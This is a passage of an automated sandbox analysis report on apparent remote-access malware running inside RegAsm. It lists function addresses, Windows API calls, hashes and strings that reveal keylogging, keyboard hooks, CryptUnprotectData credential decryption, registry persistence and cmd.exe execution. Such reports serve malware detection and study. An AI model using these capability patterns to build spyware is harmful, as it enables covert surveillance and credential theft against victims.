                                                                                                                                                                                                    • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                                                                                                                                                    • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                                                                                                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040AFA9
                                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040AFB5
                                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CreateThread$LocalTime$wsprintf
                                                                                                                                                                                                  • String ID: Online Keylogger Started
                                                                                                                                                                                                  • API String ID: 112202259-1258561607
                                                                                                                                                                                                  • Opcode ID: 365fe234e7c63b24606a5b5b17b3dee8777c5a3443b42bc0c5888d8fa6c2e7ce
                                                                                                                                                                                                  • Instruction ID: 1fd114496b08e8c1d91a2f23279a740fccf8855fe00c80ef0b78f2cd7c44f0e8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 365fe234e7c63b24606a5b5b17b3dee8777c5a3443b42bc0c5888d8fa6c2e7ce
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A01C4A07003193EE62076368C8BDBF7A6DCA91398F4004BFF641362C2E97D1C1586FA
                                                                                                                                                                                                  Function 00406A9E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(crypt32), ref: 00406ABD
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00406AC4
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                  • String ID: CryptUnprotectData$crypt32
                                                                                                                                                                                                  • API String ID: 2574300362-2380590389
                                                                                                                                                                                                  • Opcode ID: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                                                                                                                                                                  • Instruction ID: 59ed3cbb63f31e38ea488d6bd85f24bb9ff1ce5495ed4d1509158228521d53cd
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2C01B975604216BBCB18CFAD9D449AF7BB4AB45300B00417EE956E3381DA74E9008B95
                                                                                                                                                                                                  Function 0040515C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 004051CA
                                                                                                                                                                                                  • SetEvent.KERNEL32(?), ref: 004051D9
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseEventHandleObjectSingleWait
                                                                                                                                                                                                  • String ID: Connection Timeout
                                                                                                                                                                                                  • API String ID: 2055531096-499159329
                                                                                                                                                                                                  • Opcode ID: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                                                                                                                                                                                                  • Instruction ID: b176daa04f7f78a72cd0d213bf0bcd41e0e3849ccec9e2477ca34bbc74fb9340
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C901F530940F00AFD7216B368D8642BBFE0EF00306704093EE68356AE2D6789800CF89
                                                                                                                                                                                                  Function 0040E800 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Exception@8Throw
                                                                                                                                                                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                  • API String ID: 2005118841-1866435925
                                                                                                                                                                                                  • Opcode ID: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                                                                                                                                                                  • Instruction ID: 287a1f786264602a2f100ba68ee8cd07dacd1bfc9ef62352ff5e55a88b78f620
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 59018F626583087AEB14B697CC03FBA33685B10708F10CC3BBD01765C2EA7D6A61C66F
                                                                                                                                                                                                  Function 0041384F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041385A
                                                                                                                                                                                                  • RegSetValueExW.ADVAPI32 ref: 00413888
                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(004752D8), ref: 00413893
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseCreateValue
                                                                                                                                                                                                  • String ID: pth_unenc
                                                                                                                                                                                                  • API String ID: 1818849710-4028850238
                                                                                                                                                                                                  • Opcode ID: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                                                                                                                                                                  • Instruction ID: 9133f253890910ff78e8f434c24b82038cc7026402723a24ca4ec17c3e6d8cb5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 15F0C271440218FBCF00AFA1EC45FEE376CEF00756F10452AF905A61A1E7759E04DA94
                                                                                                                                                                                                  Function 0040DFE1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
                                                                                                                                                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
                                                                                                                                                                                                    • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
                                                                                                                                                                                                    • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                                                                                                                                  • String ID: bad locale name
                                                                                                                                                                                                  • API String ID: 3628047217-1405518554
                                                                                                                                                                                                  • Opcode ID: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                                                                                                                                                                  • Instruction ID: 7f9ccd90240ef42149755af47b5df127ed13e8783c268b42739d505c0e35a915
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 77F08131544A085AC338FA62D863DDA73B49F14358F50457FB406268D2EF78BA0CCA9D
                                                                                                                                                                                                  Function 10004B39 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FreeHandleLibraryModule
                                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                  • API String ID: 662261464-1276376045
                                                                                                                                                                                                  • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                                                                                                                                  • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                                                                                                                                                                                                  Function 00448B66 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: LocaleValid
                                                                                                                                                                                                  • String ID: IsValidLocaleName$kKD$t'`/
                                                                                                                                                                                                  • API String ID: 1901932003-3261428104
                                                                                                                                                                                                  • Opcode ID: 411afafda0bfc4592f61c6642b3d3a7ff2b19ca3a749cc907bc85bd1ec8c8ae6
                                                                                                                                                                                                  • Instruction ID: c774fcfd7954269485cc3e12fd2bed3330e0a6a7af379781e67d062e13931268
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 411afafda0bfc4592f61c6642b3d3a7ff2b19ca3a749cc907bc85bd1ec8c8ae6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9BF05230A80708FBDB016B60DC06FAE7B54CB44B12F10007EFD046B291DE799E0091ED
                                                                                                                                                                                                  Function 00416C68 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33threadCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
                                                                                                                                                                                                  • ShowWindow.USER32(00000009), ref: 00416C9C
                                                                                                                                                                                                  • SetForegroundWindow.USER32 ref: 00416CA8
                                                                                                                                                                                                    • Part of subcall function 0041CE2C: AllocConsole.KERNEL32 ref: 0041CE35
                                                                                                                                                                                                    • Part of subcall function 0041CE2C: GetConsoleWindow.KERNEL32 ref: 0041CE3B
                                                                                                                                                                                                    • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                                                                                                                                                                    • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Window$Console$Show$AllocCreateForegroundOutputThread
                                                                                                                                                                                                  • String ID: !D@
                                                                                                                                                                                                  • API String ID: 186401046-604454484
                                                                                                                                                                                                  • Opcode ID: 66a4db702971166e51169c96c42166a39a03490b62fdad1c1d9be1af324f9392
                                                                                                                                                                                                  • Instruction ID: 9f5213224becab59645eda34593d96b16d6ada18beeab21aaf628210512d7754
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 66a4db702971166e51169c96c42166a39a03490b62fdad1c1d9be1af324f9392
                                                                                                                                                                                                  • Instruction Fuzzy Hash: ECF05E70149340EAD720AB62ED45AFA7B69EB54341F01487BF909C20F2DB389C94865E
                                                                                                                                                                                                  Function 00416129 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExecuteShell
                                                                                                                                                                                                  • String ID: /C $cmd.exe$open
                                                                                                                                                                                                  • API String ID: 587946157-3896048727
                                                                                                                                                                                                  • Opcode ID: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                                                                                                                                                                  • Instruction ID: 08f4dee505367bf09000beb2be63de5ecd082ae46aa0e0363999309db21c3e05
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5EE0C0B0204305ABC605F675DC96CBF73ADAA94749B50483F7142A20E2EF7C9D49C65D
                                                                                                                                                                                                  Function 0040B8E7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20threadCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                                                                                                                                                                  • UnhookWindowsHookEx.USER32 ref: 0040B902
                                                                                                                                                                                                  • TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: TerminateThread$HookUnhookWindows
                                                                                                                                                                                                  • String ID: pth_unenc
                                                                                                                                                                                                  • API String ID: 3123878439-4028850238
                                                                                                                                                                                                  • Opcode ID: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                                                                                                                                                                  • Instruction ID: 372ac16de24f92ae7b862ff59389ff52a9cc8b3ac2037ffe6dc6d1e564519698
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 71E01272204315EFD7201F909C888667AADEE1539632409BEF6C261BB6CB7D4C54C79D
                                                                                                                                                                                                  Function 0040140A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                  • String ID: GetCursorInfo$User32.dll
                                                                                                                                                                                                  • API String ID: 1646373207-2714051624
                                                                                                                                                                                                  • Opcode ID: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                                                                                                                                                                  • Instruction ID: 8b26e8b19aea132afe7ec2793fcae50f4a2deac5c44528798ee909e27cd98dc2
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6BB092B4981740FB8F102BB0AE4EA193A25B614703B1008B6F046961A2EBB888009A2E
                                                                                                                                                                                                  Function 004014AF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(User32.dll), ref: 004014B9
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                  • String ID: GetLastInputInfo$User32.dll
                                                                                                                                                                                                  • API String ID: 2574300362-1519888992
                                                                                                                                                                                                  • Opcode ID: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                                                                                                                                                                  • Instruction ID: d02e03e3b89f99dad65f23c179d95e13f318a7fd709defe56253aab8848571e2
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: EFB092B8580300FBCB102FA0AD4E91E3A68AA18703B1008A7F441C21A1EBB888009F5F
                                                                                                                                                                                                  Function 0044A084 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1036877536-0
                                                                                                                                                                                                  • Opcode ID: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                                                                                                                                                                  • Instruction ID: 8ce1af842cd152cb2b2428f5d584a25f6c9224aafe101b92c03b71ca88d34985
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 87A156729846829FF721CF58C8817AEBBA5FF15314F2841AFE8859B381D27C8C51C75A
                                                                                                                                                                                                  Function 00456C9A Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                  • Opcode ID: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                                                                                                                                                                                  • Instruction ID: 6f8591e81a910498abf0b0e408487d1c0faf04506bf4bd3dd9e850377c22d226
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34413931B00104AAEB207B7A9C4666F3AB5DF45735F570A1FFD28C7293DA7C481D426A
                                                                                                                                                                                                  Function 00442851 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                                                                                                                                                                  • Instruction ID: b0a34e1ed6630e1fb57c9e62860a3601010315cd62f19612bff23542d182db60
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 70412AB1600704BFE724AF79CD41B5EBBE8EB88714F10462FF145DB281E3B999058798
